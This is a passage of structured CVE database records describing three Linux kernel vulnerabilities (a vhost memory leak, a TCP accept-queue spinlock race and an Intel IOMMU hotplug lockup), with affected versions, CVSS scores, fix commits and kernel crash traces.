"url": "https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-0340",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-01-09T19:24:12.513121Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-06-17T20:39:18.652Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"collectionURL": "https://git.kernel.org/pub/scm/linux/kernel",
"defaultStatus": "unaffected",
"packageName": "kernel",
"versions": [
{
"lessThan": "6.4-rc6",
"status": "affected",
"version": "0",
"versionType": "semver"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::nfv",
"cpe:/a:redhat:enterprise_linux:8::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.5.1.rt7.346.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:8::crb",
"cpe:/o:redhat:enterprise_linux:8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-553.5.1.el8_10",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-503.11.1.el9_5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/o:redhat:enterprise_linux:9::baseos",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-503.11.1.el9_5",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.4::realtime",
"cpe:/a:redhat:rhel_eus:9.4::crb",
"cpe:/a:redhat:rhel_eus:9.4::appstream",
"cpe:/o:redhat:rhel_eus:9.4::baseos",
"cpe:/a:redhat:rhel_eus:9.4::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.4 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-427.68.1.el9_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-05-22T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A vulnerability was found in vhost_new_msg in drivers/vhost/vhost.c in the Linux kernel, which does not properly initialize memory in messages passed between virtual guests and the host operating system in the vhost/vhost.c:vhost_new_msg() function. This issue can allow local privileged users to read some kernel memory contents when reading from the /dev/vhost-net device file."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Low"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "NONE",
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-200",
"description": "Exposure of Sensitive Information to an Unauthorized Actor",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-07T17:06:21.545Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:3618",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3618"
},
{
"name": "RHSA-2024:3627",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3627"
},
{
"name": "RHSA-2024:9315",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:9315"
},
{
"name": "RHSA-2025:7526",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:7526"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-0340"
},
{
"name": "RHBZ#2257406",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2257406"
},
{
"url": "https://lore.kernel.org/lkml/5kn47peabxjrptkqa6dwtyus35ahf4pcj4qm4pumse33kxqpjw@mec4se5relrc/T/"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-01-09T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-05-22T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: information disclosure in vhost/vhost.c:vhost_new_msg()",
"x_redhatCweChain": "CWE-200: Exposure of Sensitive Information to an Unauthorized Actor"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-0340",
"datePublished": "2024-01-09T17:36:11.578Z",
"dateReserved": "2024-01-09T12:08:22.012Z",
"dateUpdated": "2025-11-07T17:06:21.545Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2024-26614 (GCVE-0-2024-26614)
Vulnerability from cvelistv5
Published
2024-02-29 15:52
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
tcp: make sure init the accept_queue's spinlocks once
When I run syz's reproduction C program locally, it causes the following
issue:
pvqspinlock: lock 0xffff9d181cd5c660 has corrupted value 0x0!
WARNING: CPU: 19 PID: 21160 at __pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508)
Hardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011
RIP: 0010:__pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508)
Code: 73 56 3a ff 90 c3 cc cc cc cc 8b 05 bb 1f 48 01 85 c0 74 05 c3 cc cc cc cc 8b 17 48 89 fe 48 c7 c7
30 20 ce 8f e8 ad 56 42 ff <0f> 0b c3 cc cc cc cc 0f 0b 0f 1f 40 00 90 90 90 90 90 90 90 90 90
RSP: 0018:ffffa8d200604cb8 EFLAGS: 00010282
RAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff9d1ef60e0908
RDX: 00000000ffffffd8 RSI: 0000000000000027 RDI: ffff9d1ef60e0900
RBP: ffff9d181cd5c280 R08: 0000000000000000 R09: 00000000ffff7fff
R10: ffffa8d200604b68 R11: ffffffff907dcdc8 R12: 0000000000000000
R13: ffff9d181cd5c660 R14: ffff9d1813a3f330 R15: 0000000000001000
FS: 00007fa110184640(0000) GS:ffff9d1ef60c0000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020000000 CR3: 000000011f65e000 CR4: 00000000000006f0
Call Trace:
<IRQ>
_raw_spin_unlock (kernel/locking/spinlock.c:186)
inet_csk_reqsk_queue_add (net/ipv4/inet_connection_sock.c:1321)
inet_csk_complete_hashdance (net/ipv4/inet_connection_sock.c:1358)
tcp_check_req (net/ipv4/tcp_minisocks.c:868)
tcp_v4_rcv (net/ipv4/tcp_ipv4.c:2260)
ip_protocol_deliver_rcu (net/ipv4/ip_input.c:205)
ip_local_deliver_finish (net/ipv4/ip_input.c:234)
__netif_receive_skb_one_core (net/core/dev.c:5529)
process_backlog (./include/linux/rcupdate.h:779)
__napi_poll (net/core/dev.c:6533)
net_rx_action (net/core/dev.c:6604)
__do_softirq (./arch/x86/include/asm/jump_label.h:27)
do_softirq (kernel/softirq.c:454 kernel/softirq.c:441)
</IRQ>
<TASK>
__local_bh_enable_ip (kernel/softirq.c:381)
__dev_queue_xmit (net/core/dev.c:4374)
ip_finish_output2 (./include/net/neighbour.h:540 net/ipv4/ip_output.c:235)
__ip_queue_xmit (net/ipv4/ip_output.c:535)
__tcp_transmit_skb (net/ipv4/tcp_output.c:1462)
tcp_rcv_synsent_state_process (net/ipv4/tcp_input.c:6469)
tcp_rcv_state_process (net/ipv4/tcp_input.c:6657)
tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1929)
__release_sock (./include/net/sock.h:1121 net/core/sock.c:2968)
release_sock (net/core/sock.c:3536)
inet_wait_for_connect (net/ipv4/af_inet.c:609)
__inet_stream_connect (net/ipv4/af_inet.c:702)
inet_stream_connect (net/ipv4/af_inet.c:748)
__sys_connect (./include/linux/file.h:45 net/socket.c:2064)
__x64_sys_connect (net/socket.c:2073 net/socket.c:2070 net/socket.c:2070)
do_syscall_64 (arch/x86/entry/common.c:51 arch/x86/entry/common.c:82)
entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:129)
RIP: 0033:0x7fa10ff05a3d
Code: 5b 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89
c2 4d 89 c8 4c 8b 4c 24 08 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d ab a3 0e 00 f7 d8 64 89 01 48
RSP: 002b:00007fa110183de8 EFLAGS: 00000202 ORIG_RAX: 000000000000002a
RAX: ffffffffffffffda RBX: 0000000020000054 RCX: 00007fa10ff05a3d
RDX: 000000000000001c RSI: 0000000020000040 RDI: 0000000000000003
RBP: 00007fa110183e20 R08: 0000000000000000 R09: 0000000000000000
R10: 0000000000000000 R11: 0000000000000202 R12: 00007fa110184640
R13: 0000000000000000 R14: 00007fa10fe8b060 R15: 00007fff73e23b20
</TASK>
The issue triggering process is analyzed as follows:
Thread A Thread B
tcp_v4_rcv //receive ack TCP packet inet_shutdown
tcp_check_req tcp_disconnect //disconnect sock
... tcp_set_state(sk, TCP_CLOSE)
inet_csk_complete_hashdance ...
inet_csk_reqsk_queue_add
---truncated---
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef Version: 168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef Version: 168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef Version: 168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef Version: 168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef Version: 168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-26614",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-11T18:28:52.275508Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "CWE-noinfo Not enough information",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-11-06T14:58:30.615Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.833Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/bc99dcedd2f422d602516762b96c8ef1ae6b2882"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/d86cc6ab33b085eaef27ea88b78fc8e2375c0ef3"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b1e0a68a0cd2a83259c444f638b417a8fffc6855"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/168e7e599860654876c2a1102a82610285c02f02"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/3982fe726a63fb3de6005e534e2ac8ca7e0aca2a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/198bc90e0e734e5f98c3d2833e8390cac3df61b2"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/inet_connection_sock.h",
"net/core/request_sock.c",
"net/ipv4/af_inet.c",
"net/ipv4/inet_connection_sock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "bc99dcedd2f422d602516762b96c8ef1ae6b2882",
"status": "affected",
"version": "168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef",
"versionType": "git"
},
{
"lessThan": "d86cc6ab33b085eaef27ea88b78fc8e2375c0ef3",
"status": "affected",
"version": "168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef",
"versionType": "git"
},
{
"lessThan": "b1e0a68a0cd2a83259c444f638b417a8fffc6855",
"status": "affected",
"version": "168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef",
"versionType": "git"
},
{
"lessThan": "168e7e599860654876c2a1102a82610285c02f02",
"status": "affected",
"version": "168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef",
"versionType": "git"
},
{
"lessThan": "3982fe726a63fb3de6005e534e2ac8ca7e0aca2a",
"status": "affected",
"version": "168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef",
"versionType": "git"
},
{
"lessThan": "198bc90e0e734e5f98c3d2833e8390cac3df61b2",
"status": "affected",
"version": "168a8f58059a22feb9e9a2dcc1b8053dbbbc12ef",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/inet_connection_sock.h",
"net/core/request_sock.c",
"net/ipv4/af_inet.c",
"net/ipv4/inet_connection_sock.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.7"
},
{
"lessThan": "3.7",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "3.7",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.7",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\ntcp: make sure init the accept_queue\u0027s spinlocks once\n\nWhen I run syz\u0027s reproduction C program locally, it causes the following\nissue:\npvqspinlock: lock 0xffff9d181cd5c660 has corrupted value 0x0!\nWARNING: CPU: 19 PID: 21160 at __pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508)\nHardware name: Red Hat KVM, BIOS 0.5.1 01/01/2011\nRIP: 0010:__pv_queued_spin_unlock_slowpath (kernel/locking/qspinlock_paravirt.h:508)\nCode: 73 56 3a ff 90 c3 cc cc cc cc 8b 05 bb 1f 48 01 85 c0 74 05 c3 cc cc cc cc 8b 17 48 89 fe 48 c7 c7\n30 20 ce 8f e8 ad 56 42 ff \u003c0f\u003e 0b c3 cc cc cc cc 0f 0b 0f 1f 40 00 90 90 90 90 90 90 90 90 90\nRSP: 0018:ffffa8d200604cb8 EFLAGS: 00010282\nRAX: 0000000000000000 RBX: 0000000000000000 RCX: ffff9d1ef60e0908\nRDX: 00000000ffffffd8 RSI: 0000000000000027 RDI: ffff9d1ef60e0900\nRBP: ffff9d181cd5c280 R08: 0000000000000000 R09: 00000000ffff7fff\nR10: ffffa8d200604b68 R11: ffffffff907dcdc8 R12: 0000000000000000\nR13: ffff9d181cd5c660 R14: ffff9d1813a3f330 R15: 0000000000001000\nFS: 00007fa110184640(0000) GS:ffff9d1ef60c0000(0000) knlGS:0000000000000000\nCS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033\nCR2: 0000000020000000 CR3: 000000011f65e000 CR4: 00000000000006f0\nCall Trace:\n\u003cIRQ\u003e\n _raw_spin_unlock (kernel/locking/spinlock.c:186)\n inet_csk_reqsk_queue_add (net/ipv4/inet_connection_sock.c:1321)\n inet_csk_complete_hashdance (net/ipv4/inet_connection_sock.c:1358)\n tcp_check_req (net/ipv4/tcp_minisocks.c:868)\n tcp_v4_rcv (net/ipv4/tcp_ipv4.c:2260)\n ip_protocol_deliver_rcu (net/ipv4/ip_input.c:205)\n ip_local_deliver_finish (net/ipv4/ip_input.c:234)\n __netif_receive_skb_one_core (net/core/dev.c:5529)\n process_backlog (./include/linux/rcupdate.h:779)\n __napi_poll (net/core/dev.c:6533)\n net_rx_action (net/core/dev.c:6604)\n __do_softirq (./arch/x86/include/asm/jump_label.h:27)\n do_softirq (kernel/softirq.c:454 kernel/softirq.c:441)\n\u003c/IRQ\u003e\n\u003cTASK\u003e\n __local_bh_enable_ip (kernel/softirq.c:381)\n __dev_queue_xmit (net/core/dev.c:4374)\n ip_finish_output2 (./include/net/neighbour.h:540 net/ipv4/ip_output.c:235)\n __ip_queue_xmit (net/ipv4/ip_output.c:535)\n __tcp_transmit_skb (net/ipv4/tcp_output.c:1462)\n tcp_rcv_synsent_state_process (net/ipv4/tcp_input.c:6469)\n tcp_rcv_state_process (net/ipv4/tcp_input.c:6657)\n tcp_v4_do_rcv (net/ipv4/tcp_ipv4.c:1929)\n __release_sock (./include/net/sock.h:1121 net/core/sock.c:2968)\n release_sock (net/core/sock.c:3536)\n inet_wait_for_connect (net/ipv4/af_inet.c:609)\n __inet_stream_connect (net/ipv4/af_inet.c:702)\n inet_stream_connect (net/ipv4/af_inet.c:748)\n __sys_connect (./include/linux/file.h:45 net/socket.c:2064)\n __x64_sys_connect (net/socket.c:2073 net/socket.c:2070 net/socket.c:2070)\n do_syscall_64 (arch/x86/entry/common.c:51 arch/x86/entry/common.c:82)\n entry_SYSCALL_64_after_hwframe (arch/x86/entry/entry_64.S:129)\n RIP: 0033:0x7fa10ff05a3d\n Code: 5b 41 5c c3 66 0f 1f 84 00 00 00 00 00 f3 0f 1e fa 48 89 f8 48 89 f7 48 89 d6 48 89 ca 4d 89\n c2 4d 89 c8 4c 8b 4c 24 08 0f 05 \u003c48\u003e 3d 01 f0 ff ff 73 01 c3 48 8b 0d ab a3 0e 00 f7 d8 64 89 01 48\n RSP: 002b:00007fa110183de8 EFLAGS: 00000202 ORIG_RAX: 000000000000002a\n RAX: ffffffffffffffda RBX: 0000000020000054 RCX: 00007fa10ff05a3d\n RDX: 000000000000001c RSI: 0000000020000040 RDI: 0000000000000003\n RBP: 00007fa110183e20 R08: 0000000000000000 R09: 0000000000000000\n R10: 0000000000000000 R11: 0000000000000202 R12: 00007fa110184640\n R13: 0000000000000000 R14: 00007fa10fe8b060 R15: 00007fff73e23b20\n\u003c/TASK\u003e\n\nThe issue triggering process is analyzed as follows:\nThread A Thread B\ntcp_v4_rcv\t//receive ack TCP packet inet_shutdown\n tcp_check_req tcp_disconnect //disconnect sock\n ... tcp_set_state(sk, TCP_CLOSE)\n inet_csk_complete_hashdance ...\n inet_csk_reqsk_queue_add \n---truncated---"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:20.332Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/bc99dcedd2f422d602516762b96c8ef1ae6b2882"
},
{
"url": "https://git.kernel.org/stable/c/d86cc6ab33b085eaef27ea88b78fc8e2375c0ef3"
},
{
"url": "https://git.kernel.org/stable/c/b1e0a68a0cd2a83259c444f638b417a8fffc6855"
},
{
"url": "https://git.kernel.org/stable/c/168e7e599860654876c2a1102a82610285c02f02"
},
{
"url": "https://git.kernel.org/stable/c/3982fe726a63fb3de6005e534e2ac8ca7e0aca2a"
},
{
"url": "https://git.kernel.org/stable/c/198bc90e0e734e5f98c3d2833e8390cac3df61b2"
}
],
"title": "tcp: make sure init the accept_queue\u0027s spinlocks once",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26614",
"datePublished": "2024-02-29T15:52:18.238Z",
"dateReserved": "2024-02-19T14:20:24.131Z",
"dateUpdated": "2025-05-04T08:52:20.332Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26891 (GCVE-0-2024-26891)
Vulnerability from cvelistv5
Published
2024-04-17 10:27
Modified
2025-05-04 08:58
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
iommu/vt-d: Don't issue ATS Invalidation request when device is disconnected
For those endpoint devices connect to system via hotplug capable ports,
users could request a hot reset to the device by flapping device's link
through setting the slot's link control register, as pciehp_ist() DLLSC
interrupt sequence response, pciehp will unload the device driver and
then power it off. thus cause an IOMMU device-TLB invalidation (Intel
VT-d spec, or ATS Invalidation in PCIe spec r6.1) request for non-existence
target device to be sent and deadly loop to retry that request after ITE
fault triggered in interrupt context.
That would cause following continuous hard lockup warning and system hang
[ 4211.433662] pcieport 0000:17:01.0: pciehp: Slot(108): Link Down
[ 4211.433664] pcieport 0000:17:01.0: pciehp: Slot(108): Card not present
[ 4223.822591] NMI watchdog: Watchdog detected hard LOCKUP on cpu 144
[ 4223.822622] CPU: 144 PID: 1422 Comm: irq/57-pciehp Kdump: loaded Tainted: G S
OE kernel version xxxx
[ 4223.822623] Hardware name: vendorname xxxx 666-106,
BIOS 01.01.02.03.01 05/15/2023
[ 4223.822623] RIP: 0010:qi_submit_sync+0x2c0/0x490
[ 4223.822624] Code: 48 be 00 00 00 00 00 08 00 00 49 85 74 24 20 0f 95 c1 48 8b
57 10 83 c1 04 83 3c 1a 03 0f 84 a2 01 00 00 49 8b 04 24 8b 70 34 <40> f6 c6 1
0 74 17 49 8b 04 24 8b 80 80 00 00 00 89 c2 d3 fa 41 39
[ 4223.822624] RSP: 0018:ffffc4f074f0bbb8 EFLAGS: 00000093
[ 4223.822625] RAX: ffffc4f040059000 RBX: 0000000000000014 RCX: 0000000000000005
[ 4223.822625] RDX: ffff9f3841315800 RSI: 0000000000000000 RDI: ffff9f38401a8340
[ 4223.822625] RBP: ffff9f38401a8340 R08: ffffc4f074f0bc00 R09: 0000000000000000
[ 4223.822626] R10: 0000000000000010 R11: 0000000000000018 R12: ffff9f384005e200
[ 4223.822626] R13: 0000000000000004 R14: 0000000000000046 R15: 0000000000000004
[ 4223.822626] FS: 0000000000000000(0000) GS:ffffa237ae400000(0000)
knlGS:0000000000000000
[ 4223.822627] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 4223.822627] CR2: 00007ffe86515d80 CR3: 000002fd3000a001 CR4: 0000000000770ee0
[ 4223.822627] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 4223.822628] DR3: 0000000000000000 DR6: 00000000fffe07f0 DR7: 0000000000000400
[ 4223.822628] PKRU: 55555554
[ 4223.822628] Call Trace:
[ 4223.822628] qi_flush_dev_iotlb+0xb1/0xd0
[ 4223.822628] __dmar_remove_one_dev_info+0x224/0x250
[ 4223.822629] dmar_remove_one_dev_info+0x3e/0x50
[ 4223.822629] intel_iommu_release_device+0x1f/0x30
[ 4223.822629] iommu_release_device+0x33/0x60
[ 4223.822629] iommu_bus_notifier+0x7f/0x90
[ 4223.822630] blocking_notifier_call_chain+0x60/0x90
[ 4223.822630] device_del+0x2e5/0x420
[ 4223.822630] pci_remove_bus_device+0x70/0x110
[ 4223.822630] pciehp_unconfigure_device+0x7c/0x130
[ 4223.822631] pciehp_disable_slot+0x6b/0x100
[ 4223.822631] pciehp_handle_presence_or_link_change+0xd8/0x320
[ 4223.822631] pciehp_ist+0x176/0x180
[ 4223.822631] ? irq_finalize_oneshot.part.50+0x110/0x110
[ 4223.822632] irq_thread_fn+0x19/0x50
[ 4223.822632] irq_thread+0x104/0x190
[ 4223.822632] ? irq_forced_thread_fn+0x90/0x90
[ 4223.822632] ? irq_thread_check_affinity+0xe0/0xe0
[ 4223.822633] kthread+0x114/0x130
[ 4223.822633] ? __kthread_cancel_work+0x40/0x40
[ 4223.822633] ret_from_fork+0x1f/0x30
[ 4223.822633] Kernel panic - not syncing: Hard LOCKUP
[ 4223.822634] CPU: 144 PID: 1422 Comm: irq/57-pciehp Kdump: loaded Tainted: G S
OE kernel version xxxx
[ 4223.822634] Hardware name: vendorname xxxx 666-106,
BIOS 01.01.02.03.01 05/15/2023
[ 4223.822634] Call Trace:
[ 4223.822634] <NMI>
